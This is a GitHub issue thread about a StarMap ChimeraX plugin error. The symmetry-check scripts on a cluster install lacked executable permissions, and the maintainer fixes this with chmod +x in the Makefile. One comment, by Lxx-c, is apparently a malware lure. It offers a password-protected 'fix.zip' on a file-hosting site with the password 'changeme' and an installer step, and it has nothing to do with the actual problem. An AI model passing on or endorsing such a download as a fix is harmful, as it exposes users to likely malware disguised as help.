### ISSUE TITLE
Error running symmetry search (Alternative 1)

### ISSUE THREAD

**Issue by kvr2007** [wlugmayr/chimerax-starmap#1]
Hello!

Our IT installed a recent version of StarMap to our cluster and the following modulefile was made to load it:

```
module load chimera rosetta/2021.16
setenv ROSETTA3  /.../rosetta/2021.16/main
append-path PATH /.../rosetta/2021.16/main/source/scripts/python/public
setenv STARMAP_TEMPLATES_DIR /.../share/starmap_templates
```

When I follow the instructions from step 10 in Box 3 in Nature Protocols to perform symmetry check, I get the following error:

`/bin/sh: check_symmetry.sh: command not found`

Here are the relevant outputs from `stmconfig` command:

```
STARMAP_VERSION = 1.2.15
ROSETTA_SCRIPTS_CMD = /.../rosetta/2021.16/main/source/bin/rosetta_scripts.default.linuxgccrelease
ROSETTA_SCRIPTS_MPI_CMD = /.../rosetta/2021.16/main/source/bin/rosetta_scripts.mpi.linuxgccrelease
ROSETTA_DENSITY_CMD = /.../rosetta/2021.16/main/source/bin/density_tools.default.linuxgccrelease
ROSETTA_SYMMDEF_CMD = ${ROSETTA3}/source/src/apps/public/symmetry/make_symmdef_file.pl
STARMAP_SYMMETRY_CMD = /apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh
STARMAP_TEMPLATES_DIR = /.../share/starmap_templates
```

I checked and file `/apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh` exists, however, it does not have executable permissions.

**Comment by Lxx-c** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wlugmayr** [comment]
Hi,

could you please try:
$ python
Python 3.11.9 | packaged by conda-forge | (main, Apr 19 2024, 18:36:13) [GCC 12.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
import os
os.path.exists('/apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh')
False

Here is my global install:
os.path.exists('/gpfs/cssb/software/rhel9/x86_64/chimerax/1.8.0/usr/libexec/UCSF-ChimeraX/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh')
True

In my case (RHEL9) UCSF-ChimeraX is case sensitive on the filesystem?

Does the following command print the help text of the script?
/bin/sh /apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh
If no, are the access rights of the folders and the file ok for you?
Since the script is called like above executable permissions are not needed.

How was the plugin installed? The default location from the ChimeraX toolshed should be in your user's folder and not in the global ChimeraX folder. This ensures that all access rights are ok for you.

**Comment by kvr2007** [comment]
>could you please try:
$ python
Python 3.11.9 | packaged by conda-forge | (main, Apr 19 2024, 18:36:13) [GCC 12.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
import os
os.path.exists('/apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh')

Returns `True`, the file exists

>Does the following command print the help text of the script?
/bin/sh /apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh

This one gives permission denied error:

```
/bin/sh /apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh
/apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/check_symmetry.sh: line 9: /apps2/xray/chimera/1.8/usr/lib/ucsf-chimerax/lib/python3.11/site-packages/chimerax/starmap/contrib/make_NCS.pl: Permission denied
```

The permissions for file `make_NCS.pl` are `-rw-r--r--`, I'll see if it can be made executable.

> How was the plugin installed? The default location from the ChimeraX toolshed should be in your user's folder and not in the global ChimeraX folder. This ensures that all access rights are ok for you.

We have a centralized installation of ChimeraX on the cluster, so that every users gets the same setup. We installed other ChimeraX plugins without any issues.

**Comment by kvr2007** [comment]
OK, figured it out ;) had to add executable permissions to files `check_symmetry.sh` and `make_NCS.pl`

**Comment by wlugmayr** [comment]
Added chmod +x to Makefile target bundle-setup
